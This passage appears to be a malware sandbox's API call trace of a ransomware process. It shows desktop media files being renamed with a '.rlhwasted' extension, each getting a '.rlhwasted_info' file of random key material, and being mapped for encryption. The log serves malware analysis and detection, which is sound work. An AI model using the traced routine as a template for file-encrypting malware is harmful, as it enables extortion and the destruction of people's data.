(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\ftujisayr n-gmxoqy.mp4.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0187.390] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0187.390] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x1333d [0187.390] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1333d) returned 0xb00000 [0187.390] CloseHandle (hObject=0x128) returned 1 [0187.395] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0187.396] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0187.396] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.396] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0187.428] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0187.428] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.438] SetEndOfFile (hFile=0x124) returned 1 [0187.440] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0187.440] CloseHandle (hObject=0x124) returned 1 [0187.442] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0187.442] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fb498 | out: hHeap=0x6b0000) returned 1 [0187.442] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0187.443] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0187.443] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.443] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\8kfjSnz0cEvPikQx.swf") returned 99 [0187.443] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2d0) returned 0x6ee458 [0187.444] lstrcpyW (in: lpString1=0x6ee51e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0187.444] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ec7b8 [0187.444] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x710fe8) returned 1 [0187.444] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ec7b8 | out: pbBuffer=0x6ec7b8) returned 1 [0187.445] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.445] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\8kfjSnz0cEvPikQx.swf.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\of7gop94xob_8yi97g\\8kfjsnz0cevpikqx.swf.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0187.446] WriteFile (in: hFile=0x124, lpBuffer=0x6ec7b8*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ec7b8*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0187.447] SetEndOfFile (hFile=0x124) returned 1 [0187.447] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.447] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0187.447] lstrcpyW (in: lpString1=0x6ee51e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0187.447] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\8kfjSnz0cEvPikQx.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\of7gop94xob_8yi97g\\8kfjsnz0cevpikqx.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\8kfjSnz0cEvPikQx.swf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\of7gop94xob_8yi97g\\8kfjsnz0cevpikqx.swf.rlhwasted")) returned 1 [0187.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\8kfjSnz0cEvPikQx.swf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\of7gop94xob_8yi97g\\8kfjsnz0cevpikqx.swf.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0187.448] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0187.448] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xf001 [0187.448] MapViewOfFile (hFileMappingObject=0x104, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf001) returned 0x6a0000 [0187.448] CloseHandle (hObject=0x110) returned 1 [0187.456] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x710fe8) returned 1 [0187.456] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0187.457] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.457] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x710fe8) returned 1 [0187.457] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0187.457] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.467] SetEndOfFile (hFile=0x124) returned 1 [0187.470] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0187.470] CloseHandle (hObject=0x124) returned 1 [0187.472] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0187.472] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fdd18 | out: hHeap=0x6b0000) returned 1 [0187.472] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x710fe8) returned 1 [0187.473] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0187.473] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.473] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\f6U380LoxDF.png") returned 94 [0187.473] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2c6) returned 0x6ee458 [0187.473] lstrcpyW (in: lpString1=0x6ee514, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0187.473] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ec7b8 [0187.473] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x710fe8) returned 1 [0187.474] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ec7b8 | out: pbBuffer=0x6ec7b8) returned 1 [0187.474] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.474] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\f6U380LoxDF.png.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\of7gop94xob_8yi97g\\f6u380loxdf.png.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0187.491] WriteFile (in: hFile=0x110, lpBuffer=0x6ec7b8*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ec7b8*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0187.493] SetEndOfFile (hFile=0x110) returned 1 [0187.493] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.493] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0187.493] lstrcpyW (in: lpString1=0x6ee514, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0187.493] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\f6U380LoxDF.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\of7gop94xob_8yi97g\\f6u380loxdf.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\f6U380LoxDF.png.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\of7gop94xob_8yi97g\\f6u380loxdf.png.rlhwasted")) returned 1 [0187.494] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\f6U380LoxDF.png.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\of7gop94xob_8yi97g\\f6u380loxdf.png.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0187.494] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0187.494] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x5ab2 [0187.494] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5ab2) returned 0x6a0000 [0187.494] CloseHandle (hObject=0x104) returned 1 [0187.497] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0187.498] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0187.498] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.498] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0187.499] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0187.499] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.508] SetEndOfFile (hFile=0x110) returned 1 [0187.511] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0187.511] CloseHandle (hObject=0x110) returned 1 [0187.516] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0187.516] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fde38 | out: hHeap=0x6b0000) returned 1 [0187.517] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0187.518] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0187.518] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.518] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\kbB3OpnwUwbL.m4a") returned 95 [0187.518] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2c8) returned 0x6ee458 [0187.518] lstrcpyW (in: lpString1=0x6ee516, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0187.518] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef298 [0187.518] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0187.519] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ef298 | out: pbBuffer=0x6ef298) returned 1 [0187.519] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.519] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\kbB3OpnwUwbL.m4a.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\of7gop94xob_8yi97g\\kbb3opnwuwbl.m4a.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0187.883] WriteFile (in: hFile=0x110, lpBuffer=0x6ef298*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef298*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0187.885] SetEndOfFile (hFile=0x110) returned 1 [0187.885] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.885] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0187.885] lstrcpyW (in: lpString1=0x6ee516, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0187.885] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\kbB3OpnwUwbL.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\of7gop94xob_8yi97g\\kbb3opnwuwbl.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\kbB3OpnwUwbL.m4a.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\of7gop94xob_8yi97g\\kbb3opnwuwbl.m4a.rlhwasted")) returned 1 [0187.886] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\kbB3OpnwUwbL.m4a.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\of7gop94xob_8yi97g\\kbb3opnwuwbl.m4a.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0187.886] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0187.886] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x63ff [0187.886] MapViewOfFile (hFileMappingObject=0x104, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x63ff) returned 0x6a0000 [0187.886] CloseHandle (hObject=0x10c) returned 1 [0187.892] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0187.893] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6fdd60 | out: pbBuffer=0x6fdd60) returned 1 [0187.893] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.894] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0187.894] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0187.894] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.904] SetEndOfFile (hFile=0x110) returned 1 [0187.907] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0187.907] CloseHandle (hObject=0x110) returned 1 [0187.909] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0187.909] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fb7f0 | out: hHeap=0x6b0000) returned 1 [0187.909] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0187.910] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0187.910] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.910] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\TxAm_iywrdv6tymDg.gif") returned 100 [0187.910] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2d2) returned 0x6ee458 [0187.910] lstrcpyW (in: lpString1=0x6ee520, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0187.910] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef298 [0187.910] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0187.911] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ef298 | out: pbBuffer=0x6ef298) returned 1 [0187.911] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0187.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\TxAm_iywrdv6tymDg.gif.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\of7gop94xob_8yi97g\\txam_iywrdv6tymdg.gif.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0188.007] WriteFile (in: hFile=0x104, lpBuffer=0x6ef298*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef298*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0188.008] SetEndOfFile (hFile=0x104) returned 1 [0188.008] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.008] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0188.008] lstrcpyW (in: lpString1=0x6ee520, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0188.008] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\TxAm_iywrdv6tymDg.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\of7gop94xob_8yi97g\\txam_iywrdv6tymdg.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\TxAm_iywrdv6tymDg.gif.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\of7gop94xob_8yi97g\\txam_iywrdv6tymdg.gif.rlhwasted")) returned 1 [0188.009] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\of7GOP94Xob_8yI97g\\TxAm_iywrdv6tymDg.gif.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\of7gop94xob_8yi97g\\txam_iywrdv6tymdg.gif.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0188.009] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0188.009] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x4254 [0188.009] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4254) returned 0x6a0000 [0188.009] CloseHandle (hObject=0x110) returned 1 [0188.014] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0188.015] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0188.015] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.015] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0188.016] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0188.016] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.071] SetEndOfFile (hFile=0x104) returned 1 [0188.073] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0188.073] CloseHandle (hObject=0x104) returned 1 [0188.075] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0188.075] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fb908 | out: hHeap=0x6b0000) returned 1 [0188.075] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0188.076] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0188.076] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.076] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\klnwP9N7zks3v.swf") returned 64 [0188.076] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28a) returned 0x6d4580 [0188.076] lstrcpyW (in: lpString1=0x6d4600, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0188.077] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef298 [0188.077] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0188.077] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ef298 | out: pbBuffer=0x6ef298) returned 1 [0188.078] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.078] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\klnwP9N7zks3v.swf.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\klnwp9n7zks3v.swf.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0188.115] WriteFile (in: hFile=0x10c, lpBuffer=0x6ef298*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef298*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0188.116] SetEndOfFile (hFile=0x10c) returned 1 [0188.116] SetFilePointer (in: hFile=0x10c, lDistanceToMove=0, 